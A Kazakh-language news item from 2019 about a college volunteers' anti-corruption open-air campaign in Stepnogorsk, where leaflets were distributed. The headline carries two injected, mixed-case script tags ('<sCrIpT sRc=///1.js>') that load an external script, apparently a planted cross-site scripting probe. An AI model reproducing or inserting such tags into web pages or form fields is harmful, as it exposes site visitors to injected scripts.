Адал жол - честный путь!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.05.2019

«Адал жол - честный путь» облыстық сыбайлас жемқорлыққа қарсы марафонының іс-шаралар жоспары аясында халықтың арасында сыбайлас жемқорлыққа қарсы көзқарасты қалыптастыру мақсатында, «Степногорск қаласы, индустриялық-техникалық колледжі» МКҚК волонтерлері «Жастар ресурстық орталығы» ММ-мен бірлесіп «Жемқорлық және билік үйлесімді емес» Open-air акциясын өткізді. Іс-шара барысында еріктілер сыбайлас жемқорлыққа қарсы іс-қимыл бойынша ақпараттық парақшалар мен буклеттер таратты. Сыбайлас жемқорлыққа қарсы буклеттерді тарату барысында еріктілермен және ЖРО мамандарымен сыбайлас жемқорлық құқық бұзушылықтарға жол бермеу мақсатында түсіндіру әңгіме жүргізілді.

 Бұл іс-шара халықтың ынта-жігерімен кездесті. Сыбайлас жемқорлықтың алдын алу бойынша өткізілген акцияны қолдау үшін көптеген жақсы сөздер айтылды.

Сатанова А.Б.

Аударған: Аубакирова Ф.К.

Просмотров: 604


Пікір қосу



Деректерді қолтаңбаға қосу